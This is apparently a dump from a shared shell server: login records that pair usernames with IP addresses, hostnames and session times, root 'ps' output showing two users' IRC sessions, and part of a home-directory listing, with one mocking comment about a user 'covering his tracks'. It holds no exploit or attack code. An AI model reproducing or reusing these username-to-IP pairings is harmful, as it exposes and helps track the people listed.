brosco           ftp      99-19-91-167.li  Sat Jun 20 09:53 - 09:58  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 09:48 - 09:53  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 09:43 - 09:47  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 09:37 - 09:42  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 09:32 - 09:37  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 09:27 - 09:32  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 09:22 - 09:27  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 09:17 - 09:22  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 09:12 - 09:16  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 09:06 - 09:11  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 09:01 - 09:06  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 08:56 - 09:01  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 08:51 - 08:56  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 08:46 - 08:51  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 08:41 - 08:45  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 08:35 - 08:40  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 08:30 - 08:35  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 08:25 - 08:30  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 08:20 - 08:25  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 08:15 - 08:20  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 08:10 - 08:14  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 08:02 - 08:09  (00:07)
omgwtf           ttypd    24-216-119-13.dh Sat Jun 20 04:49 - 04:55  (00:05)
pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 02:13 - 02:14  (00:00)
kruapra          ttypd    75.80.56.213     Sat Jun 20 01:08 - 01:38  (00:30)
yaquis           ttypd    186.136.137.30   Fri Jun 19 23:51 - 23:57  (00:05)
yaquis           ttypd    ip72-223-92-235. Fri Jun 19 22:17 - 22:48  (00:30)
pimpinjg         ttypd    76.175.20.182    Fri Jun 19 20:41 - 20:43  (00:01)
psycoz           ttypd    xdsl-213-196-228 Fri Jun 19 18:53 - 19:10  (00:16)
psycoz           ttypd    xdsl-213-196-228 Fri Jun 19 18:50 - 18:50  (00:00)
yaquis           ttypd    186.136.137.30   Fri Jun 19 18:24 - 18:27  (00:02)
matt             ftp      75-130-211-104.  Fri Jun 19 17:13 - 17:23  (00:09)
matt             ftp      75-130-211-104.  Fri Jun 19 16:57 - 17:02  (00:05)
matt             ttypd    75-130-211-104.d Fri Jun 19 16:56 - 17:12  (00:16)
matt             ftp      75-130-211-104.  Fri Jun 19 15:49 - 15:50  (00:00)
matt             ttypd    75-130-211-104.d Fri Jun 19 15:44 - 15:50  (00:05)
matt             ftp      75-130-211-104.  Fri Jun 19 15:43 - 15:49  (00:05)
matt             ftp      75-130-211-104.  Fri Jun 19 15:18 - 15:36  (00:18)
matt             ftp      75-130-211-104.  Fri Jun 19 15:10 - 15:16  (00:06)
matt             ftp      75-130-211-104.  Fri Jun 19 15:02 - 15:08  (00:05)
matt             ftp      75-130-211-104.  Fri Jun 19 14:55 - 15:00  (00:05)
matt             ttypd    75-130-211-104.d Fri Jun 19 14:48 - 15:36  (00:47)
matt             ftp      75-130-211-104.  Fri Jun 19 14:46 - 14:53  (00:06)
matt             ttypd    75-130-211-104.d Fri Jun 19 14:33 - 14:46  (00:12)
matt             ftp      75-130-211-104.  Fri Jun 19 14:29 - 14:40  (00:10)
matt             ttypd    75-130-211-104.d Fri Jun 19 14:18 - 14:33  (00:14)
matt             ftp      75-130-211-104.  Fri Jun 19 14:17 - 14:25  (00:07)
matt             ftp      75-130-211-104.  Fri Jun 19 14:14 - 14:15  (00:01)
matt             ftp      75-130-211-104.  Fri Jun 19 14:06 - 14:11  (00:05)
pimpinjg         ttypf    cpe-76-175-20-18 Thu Jun 18 22:53 - 22:57  (00:04)
smash            ttypd    ntora.eml.ee     Thu Jun 18 20:44 - 21:12  (00:28)
yaquis           ttypd    186.136.137.30   Thu Jun 18 18:21 - 18:29  (00:08)
chaos1           ttypf    94-195-18-213.zo Thu Jun 18 16:34 - 16:41  (00:07)
cpu              ttype    63-253-113-213.i Thu Jun 18 15:55 - 18:16  (02:21)
cpu              ttypd    63-253-113-213.i Thu Jun 18 14:00 - 18:03  (04:03)
pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 05:11 - 05:12  (00:01)
pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:53 - 05:07  (00:14)
pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:42 - 04:42  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 04:28 - 04:41  (00:12)
pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 02:03 - 02:44  (00:41)
pimpinjg         ttypd    cpe-76-175-20-18 Wed Jun 17 21:10 - 21:52  (00:42)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:37 - 19:37  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:30 - 19:37  (00:06)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:29 - 19:30  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:29  (00:01)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:27  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:25 - 19:26  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:23 - 19:25  (00:01) 
romeo            ttypg    188.49.118.210   Wed Jun 17 18:35 - 18:35  (00:00) // RoMeO covering his tracks, once again.. lulz
cpu              ttype    63-253-113-213.i Wed Jun 17 17:50 - 17:54  (00:04)
cpu              ttypd    63-253-113-213.i Wed Jun 17 17:33 - 19:56  (02:22)
cpu              ttypd    63-253-113-213.i Wed Jun 17 17:23 - 17:27  (00:04)
katsst           ttypd    adsl-76-240-177- Wed Jun 17 12:39 - 13:09  (00:30)
yaquis           ttyp2    ip72-223-92-235. Wed Jun 17 01:49 - 01:54  (00:05)
katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:46 - 20:16  (00:30)
katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:33 - 19:46  (00:13)
katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:24 - 19:33  (00:08)
katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:16 - 19:24  (00:07)
katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:08 - 19:16  (00:08)
katsst           ttyp9    adsl-76-240-177- Tue Jun 16 19:01 - 19:08  (00:07)
katsst           ttyp9    adsl-76-240-177- Tue Jun 16 18:44 - 19:01  (00:16)
katsst           ttyp9    adsl-76-240-177- Tue Jun 16 18:37 - 18:44  (00:06)
yaquis           ttypd    ip72-223-92-235. Tue Jun 16 18:12 - 18:20  (00:07)
katsst           ttyp9    adsl-76-240-177- Tue Jun 16 18:02 - 18:32  (00:30)
katsst           ttyp2    adsl-76-240-177- Tue Jun 16 13:47 - 14:17  (00:30)
matt             ttyp2    71-91-220-184.dh Tue Jun 16 10:58 - 11:40  (00:42)
devil            ttyp2    190.42.73.135    Tue Jun 16 10:18 - 10:18  (00:00)
katsst           ttyp9    cpe-75-84-149-5. Tue Jun 16 00:10 - 00:40  (00:30)
katsst           ttyp2    cpe-75-84-149-5. Tue Jun 16 00:08 - 00:38  (00:30)
katsst           ttyp2    cpe-75-84-149-5. Mon Jun 15 22:45 - 23:15  (00:30)
matt             ttyp2    71-91-220-184.dh Mon Jun 15 22:05 - 22:19  (00:14)
kruapra          ttyp2    75.80.56.213     Mon Jun 15 21:13 - 21:43  (00:30)
yaquis           ttyp9    189.176.226.15   Mon Jun 15 15:57 - 15:57  (00:00)
matt             ttyp2    71-91-220-184.dh Mon Jun 15 15:52 - 16:18  (00:26)
chaos1           ttyp2    94-195-18-213.zo Mon Jun 15 13:53 - 14:26  (00:33)
crrj13           ttyp2    c-24-23-247-110. Mon Jun 15 13:01 - 13:01  (00:00)
crrj13           ttypd    h-67-103-110-220 Mon Jun 15 12:48 - 12:53  (00:05)
katsst           ttyp9    cpe-75-84-149-5. Mon Jun 15 12:31 - 13:01  (00:30)
ste              ttyp2    doc-24-32-94-198 Mon Jun 15 12:22 - 12:59  (00:37)
katsst           ttyp6    cpe-75-84-149-5. Mon Jun 15 05:43 - 06:13  (00:30)
alexbb           ttyp6    53551eb9.cable.c Sun Jun 14 22:36 - 22:41  (00:05)
katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 22:20 - 22:50  (00:30)
katsst           ttyp9    cpe-75-84-149-5. Sun Jun 14 16:11 - 16:41  (00:30)
katsst           ttyp8    cpe-75-84-149-5. Sun Jun 14 16:11 - 16:41  (00:30)
kruapra          ttyp6    75.80.56.213     Sun Jun 14 13:17 - 13:19  (00:02)
katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 10:44 - 16:13  (05:29)
katsst           ttyp6    cpe-75-84-149-5. Sun Jun 14 09:48 - 10:18  (00:30)
katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 07:42 - 08:12  (00:30)
katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 00:29 - 00:59  (00:30)
poolboy          ttyp2    pool-173-77-179- Sat Jun 13 22:47 - 23:21  (00:33)
matt             ttyp8    71.81.151.8      Sat Jun 13 21:01 - 22:39  (01:37)
yaquis           ttyp6    ip72-223-92-235. Sat Jun 13 20:54 - 21:35  (00:41)
katsst           ttyp2    cpe-75-84-149-5. Sat Jun 13 20:37 - 21:07  (00:30)
katsst           ttyp2    adsl-76-240-177- Sat Jun 13 17:26 - 17:56  (00:30)
kruapra          ttyp2    75.80.56.213     Sat Jun 13 15:57 - 16:04  (00:06)
kruapra          ttyp2    75.80.56.213     Sat Jun 13 15:19 - 15:43  (00:24)
katsst           ttyp2    adsl-76-240-177- Sat Jun 13 13:01 - 13:31  (00:30)
katsst           ttyp2    cpe-75-84-149-5. Sat Jun 13 11:49 - 12:19  (00:30)
katsst           ttyp6    cpe-75-84-149-5. Sat Jun 13 09:15 - 09:45  (00:30)
matt             ttyp2    71-14-179-247.dh Fri Jun 12 23:23 - 00:56  (01:33)
lyhne1           ttyp2    74-44-57-79.dr01 Fri Jun 12 21:25 - 21:37  (00:11)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 15:01 - 15:05  (00:03)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:55 - 15:01  (00:06)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:47 - 14:54  (00:06)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:39 - 14:47  (00:07)
katsst           ttyp6    adsl-76-240-177- Fri Jun 12 14:34 - 14:39  (00:04)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:32 - 14:36  (00:03)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:31 - 14:32  (00:01)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:20 - 14:31  (00:10)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:14 - 14:19  (00:05)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:11 - 14:14  (00:03)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:01 - 14:10  (00:09)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 13:52 - 14:01  (00:08)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 13:49 - 13:52  (00:03)
yaquis           ttyp6    189.172.83.139   Fri Jun 12 13:31 - 13:36  (00:05)
katsst           ttyp2    adsl-76-240-177- Fri Jun 12 13:26 - 13:49  (00:23)
matt             ttyp2    71.81.144.125    Fri Jun 12 11:56 - 12:16  (00:20)
matt             ttyp2    71-91-221-246.dh Thu Jun 11 22:15 - 03:21  (05:05)
matt             ttyp2    71-91-221-246.dh Thu Jun 11 20:58 - 21:02  (00:03)
yaquis           ttyp2    ip72-223-92-235. Thu Jun 11 20:24 - 20:55  (00:31)
kruapra          ttyp2    75.80.56.213     Thu Jun 11 19:49 - 20:19  (00:30)
smash            ttyp6    88.196.163.223   Thu Jun 11 17:10 - 18:03  (00:53)
yaquis           ttyp2    189.176.224.156  Thu Jun 11 16:20 - 16:24  (00:04)
yaquis           ttyp2    189.176.224.156  Thu Jun 11 16:11 - 16:16  (00:05)
yaquis           ttyp6    189.176.224.156  Thu Jun 11 14:31 - 14:32  (00:01)
hts              ttyp2    pool-71-114-161- Thu Jun 11 10:54 - 10:56  (00:01)
sysc             ttyp6    66.197.170.181   Thu Jun 11 07:33 - 07:52  (00:19)
sysc             ttyp6    66.197.170.181   Thu Jun 11 07:13 - 07:26  (00:13)
blkgraz          ttyp2    71.252.210.34    Thu Jun 11 06:15 - 10:54  (04:39)
sysc             ttyp2    218.236.90.157   Thu Jun 11 05:38 - 05:43  (00:04)
alexbb           ttyp2    83.85.30.185     Thu Jun 11 04:46 - 04:49  (00:03)
blkgraz          ttyp2    71.252.210.34    Thu Jun 11 04:00 - 04:46  (00:45)
ioplex           ttyp2    66.229.254.200   Wed Jun 10 22:30 - 22:44  (00:14)
ioplex           ttyp2    66.229.254.200   Wed Jun 10 22:00 - 22:30  (00:30)
ioplex           ttyp2    66.229.254.200   Wed Jun 10 21:29 - 21:59  (00:30)
ioplex           ttyp2    66.229.254.200   Wed Jun 10 20:59 - 21:29  (00:30)
matt             ttyp6    75.130.209.152   Wed Jun 10 20:54 - 00:28  (03:33)
ioplex           ttyp2    66.229.254.200   Wed Jun 10 20:29 - 20:59  (00:30)
bollox           ttyp2    81.129.70.166    Wed Jun 10 16:42 - 17:01  (00:18)
qfx              ttyp2    62.194.154.102   Wed Jun 10 14:29 - 15:38  (01:08)
blkgraz          ttyp6    71.252.210.34    Wed Jun 10 03:38 - 20:54  (17:16)
hts              ttyp6    71.114.161.104   Wed Jun 10 00:28 - 00:29  (00:00)
sqd              ftp      121.210.177.215  Tue Jun  9 19:46 - 19:51  (00:05)
crrj13           ttyp6    71.202.99.66     Tue Jun  9 16:50 - 16:51  (00:00)
katsst           ttyp6    76.240.177.107   Tue Jun  9 14:55 - 15:25  (00:30)
matt             ttyp2    71.81.151.141    Tue Jun  9 14:27 - 04:04  (13:36)
redrum           ttyp2    iani.de          Tue Jun  9 13:36 - 13:38  (00:02)
katsst           ttyp8    76.240.177.107   Tue Jun  9 13:34 - 14:04  (00:30)
redrum           ttyp2    iani.de          Tue Jun  9 13:33 - 13:35  (00:01)
katsst           ttyp2    76.240.177.107   Tue Jun  9 13:01 - 13:31  (00:30)
chaos1           ttyp6    69.143.254.180   Tue Jun  9 12:53 - 13:36  (00:42)
redrum           ttyp2    iani.de          Tue Jun  9 12:48 - 13:01  (00:12)
qfx              ttyp2    62.194.154.102   Tue Jun  9 11:06 - 11:37  (00:31)
psycoz           ttyp2    81.173.252.237   Tue Jun  9 05:28 - 05:34  (00:06)
alexbb           ttyp6    83.85.30.185     Mon Jun  8 23:26 - 03:39  (04:13)
yaquis           ttyp6    72.223.92.235    Mon Jun  8 22:37 - 22:57  (00:20)
matt             ttyp6    75.130.211.22    Mon Jun  8 20:46 - 21:03  (00:16)
blkgraz          ttyp8    71.252.210.34    Mon Jun  8 20:13 - 13:34  (17:21)
ste              ttyp6    69.29.159.182    Mon Jun  8 19:10 - 20:46  (01:36)
matt             ttyp2    75.130.211.22    Mon Jun  8 17:20 - 00:57  (07:37)
matt             ttyp6    75.130.211.22    Mon Jun  8 16:28 - 17:15  (00:46)
matt             ttyp2    75.130.211.22    Mon Jun  8 13:29 - 16:30  (03:01)
matt             ttyp2    75.130.211.22    Mon Jun  8 13:12 - 13:28  (00:16)
alexbb           ttyp8    83.85.30.185     Mon Jun  8 11:26 - 12:18  (00:52)
matt             ttyp6    75.130.211.22    Mon Jun  8 11:24 - 11:32  (00:08)
matt             ttyp2    75.130.211.22    Mon Jun  8 11:21 - 11:51  (00:30)
chaos1           ttyp2    69.143.254.180   Mon Jun  8 06:25 - 06:29  (00:03)
alexbb           ttyp6    83.85.30.185     Sun Jun  7 21:59 - 22:31  (00:31)
chaos1           ttyp6    69.143.254.180   Sun Jun  7 21:09 - 21:11  (00:01)
yaquis           ttyp6    72.223.92.235    Sun Jun  7 19:05 - 19:28  (00:22)
matt             ttyp2    71.81.144.135    Sun Jun  7 18:25 - 00:49  (06:23)
matt             ttyp2    71.81.144.135    Sun Jun  7 18:02 - 18:25  (00:23)
yaquis           ttyp2    72.223.92.235    Sun Jun  7 17:25 - 17:56  (00:31)
psycoz           ttyp2    84.44.225.41     Sun Jun  7 17:01 - 17:13  (00:11)
psycoz           ttyp2    84.44.225.41     Sun Jun  7 16:51 - 17:01  (00:10)
alexbb           ftp      53551EB9.cable.  Sun Jun  7 15:40 - 15:40  (00:00)
alexbb           ttyp2    83.85.30.185     Sun Jun  7 15:30 - 15:42  (00:12)
sysc             ttyp2    24.183.103.36    Sun Jun  7 12:18 - 12:59  (00:41)
yaquis           ttyp2    72.223.92.235    Sun Jun  7 01:52 - 02:28  (00:35)
kruapra          ttyp2    75.80.56.213     Sat Jun  6 21:29 - 21:59  (00:30)
cazz1961         ttyp2    81.159.148.247   Sat Jun  6 19:03 - 19:40  (00:36)
cazz1961         ttyp6    90.205.23.22     Sat Jun  6 18:37 - 19:07  (00:30)
katsst           ttyp2    76.240.177.107   Sat Jun  6 18:24 - 18:54  (00:30)
katsst           ttyp2    76.240.177.107   Sat Jun  6 16:18 - 16:48  (00:30)
katsst           ttyp2    76.240.177.107   Sat Jun  6 12:34 - 13:04  (00:30)
sysc             ttyp2    66.197.170.181   Sat Jun  6 11:54 - 12:08  (00:14)
yaquis           ttyp2    189.176.79.52    Sat Jun  6 11:38 - 11:45  (00:07)
devil            ttyp6    190.42.90.138    Sat Jun  6 09:34 - 09:34  (00:00)
cazz1961         ttyp2    90.205.23.123    Sat Jun  6 09:21 - 09:55  (00:33)
howell1          ttyp2    93.97.125.103    Sat Jun  6 08:22 - 08:22  (00:00)
asriel           ttyp2    66.197.170.181   Sat Jun  6 07:36 - 07:37  (00:00)
sysc             ttyp2    66.197.170.181   Sat Jun  6 06:57 - 07:32  (00:35)
yaquis           ttyp2    72.223.92.235    Sat Jun  6 01:18 - 01:44  (00:25)
yaquis           ttyp2    189.176.79.52    Sat Jun  6 01:11 - 01:13  (00:02)
blkgraz          ttyp8    71.252.210.34    Fri Jun  5 18:54 - 11:26 (2+16:31)
katsst           ttyp6    76.240.177.107   Fri Jun  5 18:41 - 19:11  (00:30)
smash            ttyp6    ntora.eml.ee     Fri Jun  5 18:07 - 18:07  (00:00)
smash            ttyp8    ntora.eml.ee     Fri Jun  5 15:03 - 15:03  (00:00)
chaos1           ttyp6    69.143.254.180   Fri Jun  5 15:02 - 15:52  (00:50)
chaos1           ttyp8    69.143.254.180   Fri Jun  5 12:34 - 12:40  (00:06)
smash            ttyp6    ntora.eml.ee     Fri Jun  5 12:18 - 13:09  (00:50)
yaquis           ttyp6    72.223.92.235    Fri Jun  5 00:56 - 01:21  (00:24)
smash            ttyp6    ntora.eml.ee     Fri Jun  5 00:13 - 00:21  (00:07)
katsst           ttyp6    76.240.177.107   Thu Jun  4 19:41 - 19:45  (00:03)
katsst           ttyp6    76.240.177.107   Thu Jun  4 19:36 - 19:41  (00:05)
katsst           ttyp6    76.240.177.107   Thu Jun  4 19:32 - 19:35  (00:03)
katsst           ttyp6    76.240.177.107   Thu Jun  4 19:27 - 19:31  (00:04)
katsst           ttyp6    76.240.177.107   Thu Jun  4 19:18 - 19:27  (00:09)
katsst           ttyp6    76.240.177.107   Thu Jun  4 19:13 - 19:17  (00:04)
katsst           ttyp6    76.240.177.107   Thu Jun  4 19:04 - 19:13  (00:08)
katsst           ttyp6    76.240.177.107   Thu Jun  4 18:57 - 19:04  (00:06)
katsst           ttyp6    76.240.177.107   Thu Jun  4 18:52 - 18:57  (00:04)
katsst           ttyp6    76.240.177.107   Thu Jun  4 18:41 - 18:52  (00:10)
katsst           ttyp6    76.240.177.107   Thu Jun  4 18:39 - 18:41  (00:02)
katsst           ttyp6    76.240.177.107   Thu Jun  4 18:28 - 18:39  (00:10)
katsst           ttyp6    76.240.177.107   Thu Jun  4 18:18 - 18:24  (00:06)
katsst           ttyp6    76.240.177.107   Thu Jun  4 18:14 - 18:18  (00:03)
katsst           ttyp6    76.240.177.107   Thu Jun  4 18:08 - 18:14  (00:06)
katsst           ttyp8    76.240.177.107   Thu Jun  4 18:06 - 18:06  (00:00)
katsst           ttyp6    76.240.177.107   Thu Jun  4 17:55 - 18:08  (00:12)
bollox           ftp      host81-129-70-1  Thu Jun  4 17:47 - 17:49  (00:01)
katsst           ttyp6    76.240.177.107   Thu Jun  4 17:44 - 17:55  (00:11)
katsst           ttyp6    76.240.177.107   Thu Jun  4 17:34 - 17:44  (00:10)
katsst           ttyp6    76.240.177.107   Thu Jun  4 17:29 - 17:34  (00:04)
smash            ttyp6    88.196.163.223   Thu Jun  4 16:39 - 17:06  (00:27)
bollox           ttyp9    81.129.70.166    Thu Jun  4 16:12 - 16:44  (00:32)
bollox           ftp      host81-129-70-1  Thu Jun  4 16:05 - 16:09  (00:04)
chaos1           ttyp8    94.195.18.213    Thu Jun  4 15:50 - 16:23  (00:32)
chaos1           ttyp6    67.86.132.29     Thu Jun  4 15:49 - 16:15  (00:26)
chaos1           ttyp6    69.143.254.180   Wed Jun  3 23:06 - 23:52  (00:45)
apo              ttyp8    75.158.79.102    Wed Jun  3 12:38 - 12:44  (00:05)
apo              ttyp6    75.158.79.102    Wed Jun  3 12:20 - 12:54  (00:33)
blkgraz          ttyp2    70.104.27.82     Wed Jun  3 12:01 - 19:16 (2+07:15)
smash            ttyp2    ntora.eml.ee     Tue Jun  2 21:03 - 22:35  (01:32)
kruapra          ttyp2    75.80.56.213     Tue Jun  2 20:05 - 20:35  (00:30)
katsst           ttyp6    76.240.177.107   Tue Jun  2 14:30 - 15:00  (00:30)
blkgraz          ttyp6    71.252.210.34    Tue Jun  2 10:39 - 11:36  (00:57)
blkgraz          ttyp2    71.252.210.34    Tue Jun  2 09:51 - 18:17  (08:26)
crrj13           ttyp2    24.23.247.110    Mon Jun  1 23:54 - 00:00  (00:06)
crrj13           ttyp2    69.3.47.203      Mon Jun  1 23:19 - 23:32  (00:13)
redrum           ttyp6    ist.kuscheli.ch  Mon Jun  1 13:49 - 14:11  (00:21)
blkgraz          ttyp2    71.252.210.34    Mon Jun  1 12:26 - 23:19  (10:53)
lordy            ttyp2    76.108.112.60    Mon Jun  1 06:20 - 06:21  (00:01)


[root@velocity:~]# ps -aux | grep romeo
root       83591  0.0  0.2  5400  2068  ??  Is    9:16AM   0:00.38 sshd: romeo [priv] (sshd)
romeo      83595  0.0  0.2  5384  2120  ??  S     9:16AM   0:04.62 sshd:  (sshd)
root       32336  0.0  0.1  1592   892  p2  S+    7:39PM   0:00.00 grep romeo
romeo      20712  0.0  0.1  3272  1248  p9  Is   Wed06AM   0:00.13 /usr/local/bin/bash
romeo      66004  0.0  0.7 10124  6844  p9  S+   Sat10AM   2:07.98 irssi -h absolute.ownage.net
romeo      24414  0.0  0.1  2040  1444  pf  S+    4:23PM   0:00.04 screen -r
romeo      83597  0.0  0.2  3240  1868  pf  Is    9:16AM   0:00.04 -bash (bash)
[root@velocity:~]# 

[root@velocity:~]# ps -aux | grep pimpinjg
root       82323  0.0  0.2  5400  2120  ??  Is    8:47AM   0:00.07 sshd: pimpinjg [priv] (sshd)
pimpinjg   82325  0.0  0.2  5384  2128  ??  I     8:47AM   0:00.35 sshd: pimpinjg@ttypd (sshd)
root       32340  0.0  0.1  1548   880  p2  R+    7:39PM   0:00.00 grep pimpinjg
pimpinjg   29257  0.0  0.1  2040  1444  pd  S+    6:20PM   0:00.03 screen -r
pimpinjg   82327  0.0  0.2  3232  1844  pd  Is    8:47AM   0:00.03 -bash (bash)
pimpinjg   20846  0.0  0.2  3268  1856  pe  Is    9:24PM   0:00.05 /usr/local/bin/bash
pimpinjg   82595  0.0  0.7 10476  7720  pe  S+    8:52AM   0:16.87 irssi -h 72.20.28.206


[root@velocity:/home]# ls -la
total 820
drwx--x--x  204 root         wheel        3584 Jun 17 18:30 ./
drwxr-xr-x   24 root         wheel         512 Jun 15 07:35 ../
drwxr-xr-x    4 ac1115       ac1115        512 Jul 10  2008 ac1115/
drwxr-xr-x    4 burnt        burnt         512 Apr 22  2005 ad/
drwxr-xr-x    3 nek0o        nek0o         512 Feb 26  2007 adro/
drwxr-xr-x    3 alexbb       alexbb        512 Jun  8 23:27 alexbb/
drwxr-xr-x    2 anux         anux          512 Feb 12  2008 anux/
drwxr-xr-x    6 apo          apo           512 Sep 28  2008 apo/
drwxr-xr-x    5 1162         1162          512 Mar  7  2007 arcade/
drwxr-xr-x    2 asriel       asriel        512 Jun  6 07:37 asriel/
drwxr-xr-x    6 athemp       athemp        512 Aug  6  2007 athemp/
drwxr-xr-x    2 daali        daali         512 Mar  1  2005 badwolf/
drwxr-xr-x    3 baxxta       baxxta        512 Jul 22  2008 baxxta/
drwxr-xr-x    2 bbblade1     bbblade1      512 Jan 15  2008 bbblade1/
drwxr-xr-x    7 1154         1154          512 Oct  9  2005 biffter/
drwxr-xr-x    3 blake96      blake96       512 Dec  9  2008 blake96/
drwxr-xr-x    2 1033         1033          512 Mar  1  2005 blazin/
drwxr-xr-x    5 blkgraz      blkgraz       512 Mar 30 23:25 blkgraz/
drwxr-xr-x    7 blotch       blotch        512 Dec 14  2008 blotch/
drwxr-xr-x    9 bluewish     bluewish      512 Apr 13 10:40 bluewish/
drwxr-xr-x    4 methanl      methanl       512 Apr 11  2007 blunted/
drwxr-xr-x    2 bnoel        bnoel         512 Dec  5  2007 bnoel/
drwxr-xr-x   14 bollox       bollox       1024 Feb 18  2008 bollox/
drwxr-xr-x    4 1146         1146          512 Jul  6  2005 boxing/
drwxr-xr-x    3 bpunux       bpunux        512 Oct 31  2008 bpunux/
drwxr-xr-x    2 brex132      brex132       512 Jun  7 12:29 brex132/
drwxr-xr-x    2 brosb4       brosb4        512 Nov 26  2008 brosb4/
drwxr-xr-x    6 brosco       brosco        512 Mar 22 06:08 brosco/
drwxr-xr-x    5 bruhaha      bruhaha       512 Aug 12  2008 bruhaha/
drwxr-xr-x    5 1226         1226          512 Nov 23  2006 bubba01/
drwxr-xr-x   13 burnt        burnt        1024 Mar 24  2008 burnt/
drwxr-xr-x    4 1117         1117          512 Mar 18  2005 c00ps/
drwxr-xr-x    3 1048         1048          512 Apr 20  2007 cake/
drwxr-xr-x    5 cappy57      cappy57       512 Jul 13  2007 cappy57/
drwxr-xr-x    4 cassand      cassand       512 Mar 19 14:35 cassand/
drwxr-xr-x    5 cazz1961     cazz1961      512 Apr 14 17:23 cazz1961/
drwxr-xr-x    6 ceejay       ceejay        512 Nov 23  2007 ceejay/
drwxr-xr-x    8 chaos1       chaos1       1024 Feb  6 15:26 chaos1/
drwxr-xr-x    6 1251         1251          512 Mar  9  2007 chatnet/
drwxr-xr-x    6 comedy       comedy        512 Jan 20  2007 cheazey/
drwxr-xr-x    5 chevym4n     chevym4n      512 Nov 23  2008 chevym4n/
drwxr-xr-x    3 chozen1      chozen1       512 Jan 26 19:31 chozen1/
drwxr-xr-x    5 chrirc       chrirc        512 Jun 12  2008 chrirc/
drwxr-xr-x    2 chrisdad     chrisdad      512 Dec 18  2008 chrisdad/
drwxr-xr-x    2 chriys       chriys        512 Dec  3  2008 chriys/
drwxr-xr-x    7 1085         1085          512 Feb 11  2007 cloudy1/
drwxr-xr-x    7 cmm          cmm          1024 May  9 07:01 cmm/
drwxr-xr-x    2 comedy       comedy        512 May 22  2008 comedy/
drwxr-xr-x    3 cont         cont          512 Jan 11 18:13 cont/
drwxr-xr-x    2 coolcat      coolcat       512 Mar 18  2008 coolcat/
drwxr-xr-x    2 corley       corley        512 May 12  2008 corley/
drwx--x--x    9 cpu          cpu          1024 Apr 14 15:23 cpu/
drwxr-xr-x   13 crash        crash        1024 Feb 19 20:40 crash/
drwxr-xr-x    7 crazie       crazie        512 Nov 26  2007 crazie/
drwxr-xr-x    8 crazyl       crazyl       1024 Apr 13  2007 crazyl/
drwxr-xr-x   23 crrj13       crrj13       1536 Mar 23 17:27 crrj13/
drwxr-xr-x    9 1159         1159          512 Sep  5  2005 d3vil/
drwxrwxrwx    8 daali        daali         512 Mar 11  2008 daali/
drwxr-xr-x    7 dano30       dano30        512 Apr 12  2007 dano30/
drwxr-xr-x    4 darien9      darien9      1536 Oct 31  2008 darien9/
drwxr-xr-x    7 dark         dark          512 Sep  3  2007 dark/
drwxr-xr-x    6 darkevil     darkevil      512 Mar 25  2008 darkevil/
drwxr-xr-x    5 darkuno3     darkuno3      512 Mar 10 10:27 darkuno3/
drwxr-xr-x    2 dasboot      dasboot       512 Mar 13 13:55 dasboot/
drwx------   11 1093         1093          512 Feb  5  2006 dave/
drwxr-xr-x    7 dealer       dealer        512 Feb 25 01:01 dealer/
drwxr-xr-x    6 1123         1123          512 Mar  1  2007 deathbal/
drwxr-xr-x    2 delion1      delion1       512 Feb 22 16:51 delion1/
drwxr-xr-x    3 cazz1961     cazz1961      512 Mar  1  2005 denial/
drwxr-xr-x    5 devil        devil         512 May 22 10:21 devil/
